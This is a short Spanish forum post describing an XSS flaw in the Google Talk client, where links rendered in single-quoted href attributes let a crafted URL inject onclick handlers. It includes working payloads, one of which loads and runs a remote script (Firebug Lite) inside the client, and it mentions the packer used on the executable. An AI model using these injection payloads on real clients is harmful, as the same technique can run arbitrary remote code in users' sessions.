Por ejemplo cuando uno escribe un enlace http://<h1>test se ejecuta inmediatamente ya que el enío del string dentro de un href no se filtra y eso significa que un xss puede alojarse en el nombre de la url y el otro en la url misma como código html.
Cuando escribimos http://<h1>test en realidad se imprime esto: <a href='http://<h1>test'>http://<h1>test</a> y como se utilizan comillas simples para los tags de html podemos escapar con http://'onclick='alert(/lol/)'x=' y quedará masomenos así:
<a href='http://'onclick='alert(/lol/)'x=''>http://'onclick='alert(/lol/)'x='</a>
xDD y el resultado es algo asi como esto:
Conversando con SirDarckCat estubimos casi toda la noche jugando con el google talk cambiandole el fondo por una imagen de doom3, paisajes, coloreando los bordes, letras hasta que a el se le ocurrió inyectar el firebug y saber un poco mas del código fuente ya que en realidad no habia archivo temporal porque utilizaba un iframe de internet explorer 6 con la dirección about:blank haciendo document.write
A los que quiean inyectar el firebug pueden escribir estas dos lineas:
Citar
http://'onclick='document.body.appendChild(document.createElement("script")).src="http://getfirebug.com/releases/lite/1.2/firebug-lite-compressed.js"'x='
hacerle click y luegoCitar
http://'onclick='alert(firebug.init())'x='
y al hacerle click llamarán a firebug Está entetenido.
Para los que quieran descompilar el ejecutable del gtalk está cifrado en molebox 2.5.7 .